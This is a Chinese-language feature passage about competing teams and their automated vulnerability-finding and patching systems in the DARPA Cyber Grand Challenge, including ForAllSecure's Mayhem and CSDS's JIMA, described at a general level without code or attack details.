當這些駭客在進行hacking時，他們會取得要分析的binary程式，了解程式如何進行，並進一步操縱他的行為。因此Shellphish建構了一隻機器人來自動進行這些工作。他們團隊的研究主要專注在入侵偵測系統，在物聯網的趨勢逐漸成長之下，軟體具有漏洞的機會更高。因此Shellphish團隊希望透過這些系統阻止對智慧家電的攻擊入侵。

        ForAllSecure是一間致力於網路安全的新創公司，大部份的成員是來自卡內基美隆大學，該團隊也長期參與CTF競賽，有許多成員是來自於CTF傳統強隊卡內基美隆大學的PPP團隊。駭客版本的搶旗遊戲（CTF），幾乎就像我們參與過的搶旗遊戲，但是所謂的”旗幟“是由電腦資料組成，而戰場則是一行行的程式碼。而CTF選手必須進行逆向工程，去攻擊並且修復這些程式。       

        相較於以往進步緩慢的人力分析，機器自動分析可說是一大突破。我們可以控制機器自動去尋找漏洞，在數分鐘的時間內，就可以處理十多個程式分析的工作，這是相當令人驚艷，人力也無法處理這麼多資訊的。而這正是CGC競賽想克服的，也是David Brumley教授的研究領域。他們的願景是可以檢測全世界的軟體，確認是否有可以被駭客利用的漏洞。並讓任何人都能確認自己使用的軟體系統是否有問題。因此他們團隊多年開發系統，不僅是想找出是否有系統Bug，更要確認這些bug是否會引發研究的安全漏洞。

         軟體bug是指會造成系統有不正確或預期以外的結果。CGC希望能夠自動化的找出並修正這些錯誤。ForAllSecure採取一個雙層的架構，Mayhem以及Murphy。Mayhem利用符號化執行去探索程式的深層路徑，並檢查是否有漏洞。相對於此，Murphy則是一套快速直覺的Fuzzer系統，可以快速觸發漏洞來證明軟體上的問題。藉由結合這兩個技術，ForAllSecure發現這樣的方式，遠比單獨使用這些技術更有效。並建構他們的CRS系統Mayhem。

        機器可以幫助我們非常有效率的去探索程式，但在進行漏洞利用時，人類的創意及直覺，是機器無法模仿的。因此真正要解決這些問題，因該要透過機器與人類互相搭配以達成。David Brumley教授也不認為機器將會取代人類，而是將人類將繁瑣重複的工作抽離出來，以發揮更有創意性的工作。

       隨著我們越來越依賴網路技術，在這樣的環境下，我們與世界上的任何人都可以影響，甚至是攻擊破壞我們的系統，有時候僅是因為駭客們覺得有趣，並進行攻擊行為。在網路上，即使是沒有關聯的人，也可能被網路攻擊，造成財務或個人資料的損失。而CSDS希望能解決這樣的問題。  

        CSDS是安全及可信賴系統中心，這次成為CGC決賽選手，參與全世界第一個完全由機器進行的CTF（capture the flag）競賽。駭客版本的搶旗遊戲，幾乎就像我們參與過的搶旗遊戲，但是所謂的”旗幟“是由電腦資料組成，而戰場則是一行行的程式碼。而CTF選手必須進行逆向工程，去攻擊並且修復這些程式。 

        CSDS是一隻兩人團隊，由Jim Alves-Foss博士及Jia Song組成。CSDS完全從零開始，開發了他們的CRS系統JIMA。今日我們所使用的電腦安全系統，例如防毒軟體，依賴於專家人工進行分析後所得出的知識來進行防禦，常見的特徵碼及安全補丁都是這類。CRS則以完全不同的方式進行，會自動的進行調查並建立自己的知識，以搜尋程式的漏洞並撰寫自己的入侵偵測系統特徵碼及安全補丁。 自動化分析，需要克服相當多的難題。

        在一般的狀況下，對程式進行反組譯取得原本的組合語言是不可能的完全正確的。但在CGC的環境下，我們可以正確的反組譯，這是因為CGC環境下，統一使用CLang進行編譯，不會有混淆的情況發生。因此CSDS以此出發，開始思考可以進行哪些研究，快速的分析在DECREE平台下所產生的Binary會有怎樣的共同點。  

       DECREE是一套簡化過後的作業系統，這個系統完全為了CTF而設計。透過特殊的檔案格式以及簡單的系統介面，與世界上的系統都不相容。因此，並不會因為與一般軟體共享程式碼造成問題，也不會有長期潛藏在系統中的漏洞。因此，這個較單純的環境，適合拿來做研究及競賽。  

       CSDS完全以靜態的方式進行程式分析，來找出潛在漏洞的程式碼位置，並進行修補，以最有效率的方式取得競賽分數。參賽者Jia Song為Jim Alves-Foss的學生，對CGC項目有興趣，並在2014秋季左右共組團隊，兩位參賽成員皆沒有參與CTF的經驗。並在2015年異軍突起，成功晉級CGC決賽。Jim Alves-Foss表示，他們以兩個人的團隊，成功在測試競賽以及預賽，都取得前五名的成績，與全世界的強隊競爭。而其他隊伍都有悠久的歷史，並有相當多的paper發表。因此Jim Alves-Foss團隊參酌這些人的做法，並採取完全不同的方式。在團隊中，Jia Song負責設計找出程式漏洞的部分，而Jim則負責進行修補。 

        若是讀者有興趣深入了解這隻兩人團隊如何過關斬將，可以參考該團隊發表在IEEE S&P Magzine上面的文章。 

The DARPA Cyber Grand Challenge: A Competitor’s Perspective